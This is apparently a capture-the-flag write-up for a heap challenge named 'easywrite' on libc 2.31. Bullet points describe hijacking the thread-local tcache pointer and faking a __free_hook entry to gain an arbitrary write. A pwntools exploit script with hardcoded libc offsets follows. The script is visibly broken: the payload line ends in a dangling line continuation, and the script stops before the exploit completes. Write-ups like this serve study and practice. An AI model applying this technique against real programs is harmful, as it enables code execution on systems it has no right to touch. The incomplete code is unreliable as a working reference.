• The challenge is simple. It provides us with a libc leak at first.
  • Then it does malloc(0x300) and allow us to do an arbirary heap write anywhere.
  • SO i just overwrite the fs[12] which stores the tcache_structure address.
  • The challenge then later does malloc(0x30) write data to the returned pointer and free.
  • After i overwrote fs[12] #(.tls) when we malloc glibc will take the address of pointer which we overwrite as tcach_structure, which we control. So i just faked a __free_hook entry and get AAW primitive.


from pwn import *
from past.builtins import xrange
from time import sleep
import random

#Addr libc 2.31
__free_hook = 0x1eeb28
tls_tcache = 0x1f34f0
system = 0x55410

if __name__ == '__main__':

	io = process('./easywrite')
#	io = remote('',20000)
	libc_base = int(io.recvline().strip().split(b':')[1],0)-0x8ec50
	__FUK = p64(0x0000000100000000)+p64(0)+\

	io.sendafter('Input your message:',__FUK)

	io.sendafter('Where to write?:',p64(libc_base+tls_tcache))